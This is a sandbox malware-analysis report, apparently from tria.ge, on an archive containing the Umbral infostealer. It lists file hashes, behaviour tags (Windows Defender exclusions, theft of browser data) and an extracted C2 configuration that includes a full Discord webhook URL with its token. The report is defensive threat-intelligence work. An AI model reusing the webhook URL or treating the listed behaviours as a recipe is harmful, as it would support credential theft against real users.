Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    Pass 8864.zip

  • Size

    4.7MB

  • Sample

    241226-wf87fstjcz

  • MD5

    0178e791918b66c56ac8359005ebb979

  • SHA1

    bcc3b8045526f713e8ccefaa1050ab8fdaf53a45

  • SHA256

    2592ac7a76bc435a210d3646794abf0a654937d0ce6553ebc14982480a169433

  • SHA512

    1dd950696d69a59fc944d8a809390dc352a13338e0e5cf81e1e274b0e04c6858cb877cb4da2c358329e017f9e2b33981611e806075cb3e1f8e3149b47a6d1bde

  • SSDEEP

    98304:RlBiFzdYGiwC+zNIfwvilltOrnmeZ0ARLuq6ZIfPHUXeH4gdkYlfnCeK60Usv:RI/ir2vr6CuF1X2Rdk4hKI4

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1320456077468368906/F7rw766V_H8a2Z__0yhCNo12vx-Ia2NeCg2Ds_H44T5Cf5iiyVYLb09YSN1sfOYJwp1p

Targets

    • Target

      Pass 8864/Argon/Argon.exe

    • Size

      229KB

    • MD5

      0141daae60d7dd08a86fc4789cfb3689

    • SHA1

      791d4a8f158313d355fad6dafa158407e80581bf

    • SHA256

      d22b7b3b76496cda8bcad31dce4b2b3ab5ed3b91926d744982e492e5b39cf296

    • SHA512

      74255f2cbb6345b4aefd7822587ca9503da2e49d41bb4306eca4e6ef96293b0f1c7e3173c8eb27aac54c1b0abebb8306d0e1d4b9aa824b153a8cd563a6640f9c

    • SSDEEP

      6144:FloZM0rIkd8g+EtXHkv/iD4+2S86YXzQUp8aLLyuOb8e1msi8i:HoZDL+EP8+2S86YXzQUp8aLLylA

    • Detect Umbral payload

    • Umbral

      Umbral stealer is an opensource moduler stealer written in C#.

    • Umbral family

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.Core.dll

    • Size

      589KB

    • MD5

      a53ba26a25f78f512cb2f393f9c96463

    • SHA1

      4176d5607859817a0b44a253c34f7edb3a46f21e

    • SHA256

      88a3b62f45225a811cdb85df6dfd95c2bff9a0e43e3b04f813b125eaca56cc9f

    • SHA512

      df1cd812fce4a46cae7f4d59256a12732367d16981b01f1067d58966d6612ae102eaa274fc3c9ac21aeb0422cf09ac1232fbe2b74d1daf6c76489f6e8de16751

    • SSDEEP

      12288:WrCyR/rpQ322fy+uFKcDmuRFNEMzeu+imQ269pRFZNIEJdIEY0lxEIPrEIgcvLc6:Va7

    Score
    1/10
    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.WinForms.dll

    • Size

      37KB

    • MD5

      92acec9aed00f134ba86a0f7c496f26c

    • SHA1

      3cd10e0afdd7955716a83d5f5d59859c6f7c7353

    • SHA256

      29fc954c3fde1749817d158f3dd5ebe9efd3b3ce9708d86092fb1e9f023a1cb0

    • SHA512

      4e11772afa9282c2f5f2565b0e908102fc8d0a08c40ca57587c338698e9ab747ff5a1673d32b6cd09d7b22b0e6c2836f1324ec8257e5223754595160a4c28ad2

    • SSDEEP

      768:umgRNRbnIfWuJCRfXBkrQYZDgcEST3p4Jjrjh2jeFSUyauTv1JKia5/Zi/WG4KgL:XQR20BUQYZDgcEST3p4JjrjaeFSUyauO

    Score
    1/10
    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.Wpf.dll

    • Size

      81KB

    • MD5

      b98c511e0f75434a66d9bf0efd1795db

    • SHA1

      515c6c1627775ce5149b410f4b19a2f25b41b2a8

    • SHA256

      1c5b6c792916d168093ef9b836f33e818d2d15d0c81f0864b5cddff97d913319

    • SHA512

      73fc64485db816be0bf135c7740ee916836c3bf03caabb85a1be7c5b3a4862cc1caa4975944cfd670f1cc2d90ae7c305cbea3dd9f27633244c51e5efcbaed2cd

    • SSDEEP

      1536:jmJUzMJcumSzTIudfRz+Ohsha87Y1DHfFWyEb30mpc4Jjr4YeUqRHhwU0fdwzvUe:YUzMJNzTIudB+Oh0a8+DHfFC30mpc4JY

    Score
    1/10
    • Target

      Pass 8864/Argon/Newtonsoft.Json.dll

    • Size

      695KB

    • MD5

      195ffb7167db3219b217c4fd439eedd6

    • SHA1

      1e76e6099570ede620b76ed47cf8d03a936d49f8

    • SHA256

      e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

    • SHA512

      56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

    • SSDEEP

      12288:GBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:GBjk38WuBcAbwoA/BkjSHXP36RMG/

    Score
    1/10
    • Target

      Pass 8864/Argon/bin/Atlantis.dll

    • Size

      6.0MB

    • MD5

      cbf096a7133c07f1a19efde61c1aca13

    • SHA1

      55e3f5a470101a291f992a24d2e370ba15b039ca

    • SHA256

      00243e13c5a23ceaa06618d2770a320038bd24a69d0252dcca09e74b5d6a0013

    • SHA512

      d9f5d9a34e86502fee87df15b13069284cf5fc7375e9d3c73011ee290e5dbfec0b137e93593f1b4227c0707df6255a4e2bc569325289735137eb07183abc58b3

    • SSDEEP

      98304:8j+/n7qBMK1BhXDn3nmDDyJa84v2aZoEmcLo3:aon1K1BhXDn3mDDyJa84v2aZtJLa

    Score
    1/10
    • Target

      Pass 8864/Argon/bin/oRniz4vtL94l.exe

    • Size

      4.1MB

    • MD5

      cd2cf251993d02bba6c82ceef9771dd8

    • SHA1

      e9695d027a4babf1a3d5c2b900d69d1213dd160e

    • SHA256

      8241f49cd516cc727a9f24a56c9fcca5d14fab162d00a17514e662238043178a

    • SHA512

      b5ffaf85f09451bef239ba7fd11361368e0750b9c9aa6b29f6450acd3a079ccb9f5a5045c0115268f731c4e82888867925f67c466626cd84d5a350b7ee3e7687

    • SSDEEP

      49152:rvVwASOvGtlqkbXPySBQnGkKX2M1m/RbtcJrzVX68TsgdVMuQni+e3d5RPPezNdx:KfySBQnGkKX2/pafVXIgml6tqq+b1

    Score
    1/10
    • Target

      Pass 8864/Argon/fix exploit.bat

    • Size

      1KB

    • MD5

      5289fa561dcb8647582896af6528671a

    • SHA1

      fda5871c543e9986194aa7c027aad8206d9bbe4a

    • SHA256

      762048396be01b02e2fb949f4276179732da23799cfb715600e333d7597475bc

    • SHA512

      f8e90026dce457483ef7a5f5341bfb54a16432457e1139b5d8f4a6d18374e05668e7e4f1248dba0ed23ce036261803094b295493eac03fcb56859d5c3fe7b679

    Score
    1/10
    • Target

      Pass 8864/Argon/message.bat

    • Size

      356B

    • MD5

      c76645f1baab3397fc8ea7200d3bb908

    • SHA1

      1a5b47e2ba0cbe028cf20d5d949db616c9b18788

    • SHA256

      17165f9adf2601664b8f6fdbf87749f46fe53c1eccdb9a1e2fad4f46ab8dd967

    • SHA512

      1c422db62279267536fbd615f90bd2648f238599e1a7063834de23e11c7219cf176df0be671cfb7f08a9d7f52a387fb936ae3e2e85446156284fdce422300c7f

    Score
    1/10
    • Target

      Pass 8864/Argon/runtimes/win-x64/native/WebView2Loader.dll

    • Size

      162KB

    • MD5

      c9a5d0f278d57d83a03404b8baeeac64

    • SHA1

      39d44b999c1d89c36136804a373d4d427bc7d679

    • SHA256

      462b36fd1be6ca9f7563466a89e57c41ef4a4def3e0a84fa885d203aea4a3aaf

    • SHA512

      97dfb08eae34624b7679a4bb07dee242b2a38324dc13b8aaec6de7f6fed477e9f9bc7474d4df9fbe907d1a460723db7177b7128a26edf5bd73d38d4d45722db6

    • SSDEEP

      3072:fXAne8TlTRTSpL1ThTNTRyMDjRb/hy75HGRtVBviiZsZ5AalCPTxiEtJx9eg8Xjm:/yTlTRTUL1ThTNTRyeLq1GRtVBvPZsrw

    Score
    1/10

MITRE ATT&CK Enterprise v15

Tasks